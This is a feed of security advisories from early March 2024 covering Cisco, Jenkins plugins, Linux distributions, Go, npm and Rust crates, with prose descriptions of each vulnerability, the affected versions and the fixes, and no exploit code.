06.03.2024 18:00:00	cisco	[CISCO-SA-SECURE-PRIVESC-SYXQO6DS] Cisco Secure Client for Linux with ISE Posture Module Privilege Escalation Vulnerability (high)	A vulnerability in the ISE Posture (System Scan) module of Cisco Secure Client for Linux could allow an authenticated, local attacker to elevate privileges on an affected device.This vulnerability is due to the use of an uncontrolled search path element. An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process. A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SECURE-PRIVESC-SYXQO6DS
06.03.2024 18:00:00	cisco	[CISCO-SA-SECURE-CLIENT-CRLF-W43V4G7] Cisco Secure Client Carriage Return Line Feed Injection Vulnerability (high)	A vulnerability in the SAML authentication process of Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user.This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link while establishing a VPN session. A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token. The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SECURE-CLIENT-CRLF-W43V4G7
06.03.2024 18:00:00	cisco	[CISCO-SA-SB-WAP-MULTI-85G83CRB] Cisco Small Business 100, 300, and 500 Series Wireless Access Points Command Injection and Buffer Overflow Vulnerabilities (medium)	Multiple vulnerabilities in the web-based management interface of Cisco Small Business 100, 300, and 500 Series Wireless Access Points (APs) could allow an authenticated, remote attacker to perform command injection and buffer overflow attacks against an affected device. In order to exploit these vulnerabilities, the attacker must have valid administrative credentials for the device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-WAP-MULTI-85G83CRB
06.03.2024 18:00:00	cisco	[CISCO-SA-DUO-WIN-BYPASS-PN42KKBM] Cisco Duo Authentication for Windows Logon and RDP Authentication Bypass Vulnerability (medium)	A vulnerability in Cisco Duo Authentication for Windows Logon and RDP could allow an authenticated, physical attacker to bypass secondary authentication and access an affected Windows device.This vulnerability is due to a failure to invalidate locally created trusted sessions after a reboot of the affected device. An attacker with primary user credentials could exploit this vulnerability by attempting to authenticate to an affected device. A successful exploit could allow the attacker to access the affected device without valid permissions.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DUO-WIN-BYPASS-PN42KKBM
06.03.2024 18:00:00	cisco	[CISCO-SA-DUO-INFODISC-RLCEQM6T] Cisco Duo Authentication for Windows Logon and RDP Information Disclosure Vulnerability (medium)	A vulnerability in the logging component of Cisco Duo Authentication for Windows Logon and RDP could allow an authenticated, local attacker to view sensitive information in clear text on an affected system.This vulnerability is due to improper storage of an unencrypted registry key in certain logs. An attacker could exploit this vulnerability by accessing the logs on an affected system. A successful exploit could allow the attacker to view sensitive information in clear text.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DUO-INFODISC-RLCEQM6T
06.03.2024 18:00:00	cisco	[CISCO-SA-APPD-XSS-3JWQSMNT] Cisco AppDynamics Controller Cross-Site Scripting Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco AppDynamics Controller could allow an authenticated, remote attacker to perform a reflected cross-site scripting (XSS) attack against a user of the interface of an affected device.This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-APPD-XSS-3JWQSMNT
06.03.2024 18:00:00	cisco	[CISCO-SA-APPD-TRAVERSAL-M7N8MZPF] Cisco AppDynamics Controller Path Traversal Vulnerability (medium)	A vulnerability in the file upload functionality of Cisco AppDynamics Controller could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device.This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to access sensitive data on an affected device.Cisco AppDynamics has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-APPD-TRAVERSAL-M7N8MZPF
06.03.2024 23:41:13	maven	[MAVEN:GHSA-M757-P8RV-4Q93] Apache Linkis DataSource: DataSource module Oracle SQL Database Password Logged (moderate)	In Apache Linkis <=1.4.0, The password is printed to the log when using the Oracle data source of the Linkis data source module. We recommend users upgrade the version of Linkis to version 1.5.0	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-M757-P8RV-4Q93
06.03.2024 14:51:56	ubuntu	[USN-6679-1] FRR vulnerability	FRR could be made to crash if it received specially crafted networktraffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6679-1
06.03.2024 19:05:59	maven	[MAVEN:GHSA-P2GX-4434-PF6G] Apache InLong Deserialization of Untrusted Data Vulnerability (high)	Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.8.0 through 1.10.0, the attackers can use the specific payload to read from an arbitrary file. Users are advised to upgrade to Apache InLong's 1.11.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/9673	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P2GX-4434-PF6G
06.03.2024 11:38:49	ubuntu	[USN-6676-1] c-ares vulnerability (medium)	c-ares could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6676-1
06.03.2024 05:13:13	ubuntu	[USN-6649-2] Firefox regressions	USN-6649-1 caused some minor regressions in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6649-2
06.03.2024 02:00:00	cisa	[CISA-2024:0306] CISA Adds 2 Known Exploited Vulnerabilities to Catalog	CISA has added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0306
06.03.2024 02:00:00	debian	[DSA-5636-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5636-1
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3302] Stored XSS vulnerability in `htmlpublisher` (high)	`htmlpublisher` 1.32 and earlier does not escape job names, report names, and index page titles shown as part of the report frame.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.`htmlpublisher` 1.32.1 escapes job names, report names, and index page titles when creating a new report.`htmlpublisher` 1.32.1 checks reports created in earlier releases for the presence of unsafe characters in the report frame, and refuses to show these frames if unsafe characters are identified.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3302
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3303] Path traversal vulnerability in `htmlpublisher` (medium)	`htmlpublisher` 1.32 and earlier archives invalid symbolic links in report directories on agents and recreates them on the controller.Attackers with Item/Configure permission can use them to determine whether a path on the Jenkins controller file system exists, without being able to access it.`htmlpublisher` 1.32.1 does not archive symbolic links.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3303
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3344] Stored XSS vulnerability in `dependency-check-jenkins-plugin` (high)	`dependency-check-jenkins-plugin` 5.4.5 and earlier does not escape vulnerability metadata from Dependency-Check reports on the Jenkins UI.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control workspace contents or CVE metadata.`dependency-check-jenkins-plugin` 5.4.6 escapes vulnerability metadata from Dependency-Check reports.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3344
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3180] Sensitive information exposure in build logs by `mq-notifier` (medium)	`mq-notifier` has a global option to log the JSON payload it sends to RabbitMQ in the build log.This includes the build parameters, some of which may be sensitive, and they are not masked.In `mq-notifier` 1.4.0 and earlier, this option is enabled by default.This results in unwanted exposure of sensitive information in build logs.`mq-notifier` 1.4.1 disables the global option to log the JSON payload it sends to RabbitMQ by default.This option is disabled when updating from a previous release and needs to be re-enabled by administrators who want to use this feature.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3180
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3144] Missing permission checks in `jenkinsci-appspider-plugin` (medium)	`jenkinsci-appspider-plugin` 1.0.16 and earlier does not perform permission checks in several HTTP endpoints.This allows attackers with Overall/Read permission to obtain information about available scan config names, engine group names, and client names.`jenkinsci-appspider-plugin` 1.0.17 requires Item/Configure permission for the affected HTTP endpoints.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3144
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3215] SSL/TLS certificate validation disabled by default in `delphix` (medium)	`delphix` provides a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections.In `delphix` 3.0.1 this option is set to disable SSL/TLS certificate validation by default.In `delphix` 3.0.2 this option is set to enable SSL/TLS certificate validation by default.NOTE: `delphix` 3.0.2 inverts the semantics of the existing option.Administrators who update from version 3.0.1 to 3.0.2 will need to toggle this option to have the previously configured behavior.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3215
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3330] Improper SSL/TLS certificate validation in `delphix` (medium)	`delphix` provides a global option for administrators to enable or disable SSL/TLS certificate validation for Data Control Tower (DCT) connections.In `delphix` 3.0.1 through 3.1.0 (both inclusive) an option change from disabled validation to enabled validation fails to take effect until Jenkins is restarted.`delphix` 3.1.1 applies the configuration change immediately when switching from disabled validation to enabled validation.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3330
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3200] CSRF vulnerability and missing permission check in `docker-build-step` (medium)	`docker-build-step` 2.11 and earlier does not perform a permission check in an HTTP endpoint implementing a connection test.This allows attackers with Overall/Read permission to connect to an attacker-specified TCP or Unix socket URL.Additionally, the plugin reconfigures itself using the provided connection test parameters, affecting future build step executions.Additionally, this endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3200
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3280] Stored XSS vulnerability in `build-monitor-plugin` (high)	`build-monitor-plugin` 1.14-860.vd06ef2568b_3f and earlier does not escape Build Monitor View names.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure Build Monitor Views.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3280
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3249] Stored XSS vulnerability in `gitbucket` (high)	`gitbucket` 0.8 and earlier does not sanitize Gitbucket URLs on build views.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3249
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3325] CSRF vulnerability and missing permission checks in `svn-partial-release-mgr` (medium)	`svn-partial-release-mgr` 1.0.1 and earlier does not perform a permission check in an HTTP endpoint.This allows attackers with Item/Read permission to trigger a build.Additionally, this endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3325
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3248] Stored XSS vulnerability in `icescrum` (high)	`icescrum` 1.1.6 and earlier does not sanitize iceScrum project URLs on build views.This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.As of publication of this advisory, there is no fix.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3248
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3333] Terrapin SSH vulnerability in `trilead-api` (medium)	`trilead-api` bundles the https://github.com/jenkinsci/trilead-ssh2/[Jenkins project's fork of the Trilead SSH2 library] for use by other plugins.`trilead-api` 2.133.vfb_8a_7b_9c5dd1 and earlier, except 2.84.86.vf9c960e9b_458, bundles versions of Jenkins/Trilead SSH2 that are susceptible to https://www.cve.org/CVERecord?id=CVE-2023-48795[CVE-2023-48795] (https://en.wikipedia.org/wiki/Terrapin_attack[Terrapin]).This vulnerability allows a machine-in-the-middle attacker to reduce the security of an SSH connection.`trilead-api` 2.141.v284120fd0c46 updates the bundled Jenkins/Trilead SSH2 library to version `build-217-jenkins-274.276.v58da_75159cb_7`, which by default removes the affected ciphers and encryption modes.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3333
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3301] Improper input sanitization in `htmlpublisher` (high)	link:/security/advisory/2018-04-16/#SECURITY-784[SECURITY-784 / CVE-20218-1000175] is a path traversal vulnerability in `htmlpublisher` 1.15 and earlier.The fix for it retained compatibility for older reports as a fallback.In `htmlpublisher` 1.16 through 1.32 (both inclusive) this fallback for reports created in `htmlpublisher` 1.15 and earlier does not properly sanitize input.This allows attackers with Item/Configure permission to do the following:* Implement stored cross-site scripting (XSS) attacks.* Determine whether a path on the Jenkins controller file system exists, without being able to access it.`htmlpublisher` 1.32.1 removes support for reports created before `htmlpublisher` 1.15.Those reports are retained on disk, but may no longer be accessible through the Jenkins UI.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3301
06.03.2024 02:00:00	jenkins	[JENKINS:SECURITY-3300] Incorrect trust policy behavior for pull requests from forks in `cloudbees-bitbucket-branch-source` (medium)	Multibranch Pipelines with Bitbucket branch source can be configured to discover pull requests from forks.The trust policy is set to "Forks in the same account" by default.In `cloudbees-bitbucket-branch-source` 866.vdea_7dcd3008e and earlier, except 848.850.v6a_a_2a_234a_c81, this trust policy allows changes to Jenkinsfiles from users without write access to the project when using Bitbucket Server.This allows attackers able to submit pull requests from forks to change the Pipeline behavior.In `cloudbees-bitbucket-branch-source` 871.v28d74e8b_4226, the "Forks in the same account" trust policy does not extend trust to Jenkinsfiles modified by users without write access to the project.NOTE: Pipelines using Bitbucket Cloud are unaffected by this issue.	https://secdb.nttzen.cloud/security-advisory/jenkins/JENKINS:SECURITY-3300
06.03.2024 02:00:00	oraclelinux	[ELSA-2024-1130] openssh security update (moderate)	[8.7p1-34.3]- Fix Terrapin attack (CVE-2023-48795) Resolves: RHEL-19764- Forbid shell metasymbols in username/hostname (CVE-2023-51385) Resolves: RHEL-19822	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1130
06.03.2024 02:00:00	oraclelinux	[ELSA-2024-1139] keylime security update (low)	[7.3.0-13]- Backport fix for CVE-2023-3674 Resolves: RHEL-21013	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1139
06.03.2024 02:00:00	oraclelinux	[ELSA-2024-1142] haproxy security update (moderate)	[2.4.22-3]- Reject '#' as part of URI path component (CVE-2023-45539, RHEL-18169)[2.4.22-2]- Reject any empty content-length header value (CVE-2023-40225, RHEL-7736)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1142
06.03.2024 02:00:00	oraclelinux	[ELSA-2024-1147] rear security update (moderate)	[2.6-21.0.1]- rear: creates a world-readable initrd (CVE-2024-23301)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1147
06.03.2024 01:15:07	alpinelinux	[ALPINE:CVE-2023-45289] go vulnerability	[From CVE-2023-45289] When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not. A maliciously crafted HTTP redirect could cause sensitive headers to be unexpectedly forwarded.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-45289
06.03.2024 01:15:07	alpinelinux	[ALPINE:CVE-2023-45290] go vulnerability	[From CVE-2023-45290] When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permits a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion. With fix, the ParseMultipartForm function now correctly limits the maximum size of form lines.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-45290
06.03.2024 01:15:07	alpinelinux	[ALPINE:CVE-2024-24783] go vulnerability	[From CVE-2024-24783] Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. This affects all crypto/tls clients, and servers that set Config.ClientAuth to VerifyClientCertIfGiven or RequireAndVerifyClientCert. The default behavior is for TLS servers to not verify client certificates.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24783
06.03.2024 01:15:07	alpinelinux	[ALPINE:CVE-2024-24784] go vulnerability	[From CVE-2024-24784] The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24784
06.03.2024 01:15:07	alpinelinux	[ALPINE:CVE-2024-24785] go vulnerability	[From CVE-2024-24785] If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-24785
06.03.2024 02:00:00	freebsd	[FREEBSD:FD3401A1-B6DF-4577-917A-2C22FEE99D34] chromium -- multiple security fixes	Chrome Releases reports: This update includes 3 security fixes: [325893559] High CVE-2024-2173: Out of bounds memory access in V8. Reported by 5fceb6172bbf7e2c5a948183b53565b9 on 2024-02-19 [325866363] High CVE-2024-2174: Inappropriate implementation in V8. Reported by 5f46f4ee2e17957ba7b39897fb376be8 on 2024-02-19 [325936438] High CVE-2024-2176: Use after free in FedCM. Reported by Anonymous on 2024-02-20	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:FD3401A1-B6DF-4577-917A-2C22FEE99D34
06.03.2024 02:00:00	freebsd	[FREEBSD:B1B039EC-DBFC-11EE-9165-901B0E9408DC] go -- multiple vulnerabilities	The Go project reports reports: crypto/x509: Verify panics on certificates with an unknown public key algorithm Verifying a certificate chain which contains a certificate with an unknown public key algorithm will cause Certificate.Verify to panic. net/http: memory exhaustion in Request.ParseMultipartForm When parsing a multipart form (either explicitly with Request.ParseMultipartForm or implicitly with Request.FormValue, Request.PostFormValue, or Request.FormFile), limits on the total size of the parsed form were not applied to the memory consumed while reading a single form line. This permitted a maliciously crafted input containing very long lines to cause allocation of arbitrarily large amounts of memory, potentially leading to memory exhaustion. net/http, net/http/cookiejar: incorrect forwarding of sensitive headers and cookies on HTTP redirect When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not. html/template: errors returned from MarshalJSON methods may break template escaping If errors returned from MarshalJSON methods contain user controlled data, they may be used to break the contextual auto-escaping behavior of the html/template package, allowing for subsequent actions to inject unexpected content into templates. net/mail: comments in display names are incorrectly handled The ParseAddressList function incorrectly handles comments (text within parentheses) within display names. Since this is a misalignment with conforming address parsers, it can result in different trust decisions being made by programs using different parsers.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:B1B039EC-DBFC-11EE-9165-901B0E9408DC
06.03.2024 16:01:14	rustsec	[RUSTSEC-2024-0021] Parts of Report are dropped as the wrong type during downcast	In affected versions, after a `Report` is constructed using `wrap_err` or`wrap_err_with` to attach a message of type `D` onto an error of type `E`, thenusing `downcast` to recover ownership of either the value of type `D` or thevalue of type `E`, one of two things can go wrong:- If downcasting to `E`, there remains a value of type `D` to be dropped. It is incorrectly "dropped" by running `E`'s drop behavior, rather than `D`'s. For example if `D` is `&str` and `E` is `std::io::Error`, there would be a call of `std::io::Error::drop` in which the reference received by the `Drop` impl does not refer to a valid value of type `std::io::Error`, but instead to `&str`.- If downcasting to `D`, there remains a value of type `E` to be dropped. When `D` and `E` do not happen to be the same size, `E`'s drop behavior is incorrectly executed in the wrong location. The reference received by the `Drop` impl may point left or right of the real `E` value that is meant to be getting dropped.In both cases, when the `Report` contains an error `E` that has nontrivial dropbehavior, the most likely outcome is memory corruption.When the `Report` contains an error `E` that has trivial drop behavior (forexample a `Utf8Error`) but where `D` has nontrivial drop behavior (such as`String`), the most likely outcome is that downcasting to `E` would leak `D`.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0021
06.03.2024 18:08:33	npm	[NPM:GHSA-82JF-8F24-XQ9M] hexo-theme-anzhiyu Cross-site Scripting vulnerability (moderate)	Cross Site Scripting (XSS) vulnerability in hexo-theme-anzhiyu v1.6.12, allows remote attackers to execute arbitrary code via the algolia search function.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-82JF-8F24-XQ9M
06.03.2024 04:24:35	rustsec	[RUSTSEC-2024-0020] Stack buffer overflow with whoami on several Unix platforms	With versions of the whoami crate >= 0.5.3 and < 1.5.0, calling any of these functions leads to animmediate stack buffer overflow on illumos and Solaris:- `whoami::username`- `whoami::realname`- `whoami::username_os`- `whoami::realname_os`With versions of the whoami crate >= 0.5.3 and < 1.0.1, calling any of the above functions alsoleads to a stack buffer overflow on these platforms:- Bitrig- DragonFlyBSD- FreeBSD- NetBSD- OpenBSDThis occurs because of an incorrect definition of the `passwd` struct on those platforms.As a result of this issue, denial of service and data corruption have both been observed in thewild. The issue is possibly exploitable as well.This vulnerability also affects other Unix platforms that aren't Linux or macOS.This issue has been addressed in whoami 1.5.0.For more information, see [this GitHub issue](https://github.com/ardaku/whoami/issues/91).	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0020
07.03.2024 23:18:06	ubuntu	[USN-6685-1] mqtt-client vulnerability (high)	mqtt-client could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6685-1
07.03.2024 22:52:17	ubuntu	[USN-6684-1] ncurses vulnerability (medium)	ncurses could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6684-1
07.03.2024 22:46:46	slackware	[SSA:2024-067-01] ghostscript (high)	New ghostscript packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/ghostscript-9.55.0-i586-2_slack15.0.txz: Rebuilt. Fixes security issues: A vulnerability was identified in the way Ghostscript/GhostPDL called tesseract for the OCR devices, which could allow arbitrary code execution. Thanks to J_W for the heads-up. Mishandling of permission validation for pipe devices could allow arbitrary code execution. For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36664 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/ghostscript-9.55.0-i586-2_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/ghostscript-9.55.0-x86_64-2_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/ghostscript-10.03.0-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/ghostscript-10.03.0-x86_64-1.txzMD5 signaturesSlackware 15.0 package:533102bd76c090b72680cf466386a458 ghostscript-9.55.0-i586-2_slack15.0.txzSlackware x86_64 15.0 package:b1ee06e28fd81b1d04a3b62a5a953886 ghostscript-9.55.0-x86_64-2_slack15.0.txzSlackware -current package:a40a1e316f17c75b753c8d9e3a59dff2 ap/ghostscript-10.03.0-i586-1.txzSlackware x86_64 -current package:799f7a0f77d8a2e7624f8b4a97942d45 ap/ghostscript-10.03.0-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg ghostscript-9.55.0-i586-2_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-067-01
07.03.2024 20:54:14	msrc	[MS:CVE-2024-2176] CVE-2024-2176		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2176
07.03.2024 20:54:12	msrc	[MS:CVE-2024-2174] CVE-2024-2174		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2174
07.03.2024 20:54:07	msrc	[MS:CVE-2024-2173] CVE-2024-2173		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-2173
07.03.2024 19:40:59	npm	[NPM:GHSA-HHHV-Q57G-882Q] jose vulnerable to resource exhaustion via specifically crafted JWE with compressed plaintext (moderate)	A vulnerability has been identified in the JSON Web Encryption (JWE) decryption interfaces, specifically related to the [support for decompressing plaintext after its decryption](https://www.rfc-editor.org/rfc/rfc7516.html#section-4.1.3). This allows an adversary to exploit specific scenarios where the compression ratio becomes exceptionally high. As a result, the length of the JWE token, which is determined by the compressed content's size, can land below application-defined limits. In such cases, other existing application level mechanisms for preventing resource exhaustion may be rendered ineffective.Note that as per [RFC 8725](https://www.rfc-editor.org/rfc/rfc8725.html#name-avoid-compression-of-encryp) compression of data SHOULD NOT be done before encryption, because such compressed data often reveals information about the plaintext. For this reason the v5.x major version of `jose` removed support for compressed payloads entirely and is therefore NOT affected by this advisory.### ImpactUnder certain conditions it is possible to have the user's environment consume unreasonable amount of CPU time or memory during JWE Decryption operations.### Affected usersThe impact is limited only to Node.js users utilizing the JWE decryption APIs to decrypt JWEs from untrusted sources.You are NOT affected if any of the following applies to you- Your code uses jose version v5.x where JWE Compression is not supported anymore- Your code runs in an environment other than Node.js (e.g. Deno, CF Workers), which is the only runtime where JWE Compression is implemented out of the box- Your code does not use the JWE decryption APIs- Your code only accepts JWEs produced by trusted sources### Patches`v2.0.7` and `v4.15.5` releases limit the decompression routine to only allow decompressing up to 250 kB of plaintext. In v4.x it is possible to further adjust this limit via the `inflateRaw` decryption option implementation. In v2.x it is possible to further adjust this limit via the `inflateRawSyncLimit` decryption option.### WorkaroundsIf you cannot upgrade and do not want to support compressed JWEs you may detect and reject these tokens early by checking the token's protected header```jsconst { zip } = jose.decodeProtectedHeader(token)if (zip !== undefined) { throw new Error('JWE Compression is not supported')}```If you wish to continue supporting JWEs with compressed payloads in these legacy release lines you must upgrade (v1.x and v2.x to version v2.0.7, v3.x and v4.x to version v4.15.5) and review the limits put forth by the patched releases.### For more informationIf you have any questions or comments about this advisory please open a discussion in the project's [repository](https://github.com/panva/jose/discussions/new?category=q-a&title=GHSA-hhhv-q57g-882q%20advisory%20question)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HHHV-Q57G-882Q
07.03.2024 16:46:12	ubuntu	[USN-6683-1] HtmlCleaner vulnerability (high)	libhtmlcleaner-java could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6683-1
07.03.2024 16:00:06	ubuntu	[USN-6682-1] Puma vulnerabilities (critical)	Several security issues were fixed in Puma.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6682-1
07.03.2024 12:15:07	alpinelinux	[ALPINE:CVE-2024-1931] unbound vulnerability (high)	[From CVE-2024-1931] NLnet Labs Unbound version 1.18.0 up to and including version 1.19.1 contain a vulnerability that can cause denial of service by a certain code path that can lead to an infinite loop. Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration. From version 1.19.2 on, the code is fixed to avoid looping indefinitely.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-1931
07.03.2024 10:00:00	msrc	[MS:CVE-2024-26167] Microsoft Edge for Android Spoofing Vulnerability (medium)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26167
07.03.2024 19:25:52	maven	[MAVEN:GHSA-J7JM-8GF5-FRCM] nGrinder vulnerable to unsafe Java objects deserialization (high)	nGrinder before 3.5.9 allows to accept serialized Java objects from unauthenticated users, which could allow remote attacker to execute arbitrary code via unsafe Java objects deserialization.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J7JM-8GF5-FRCM
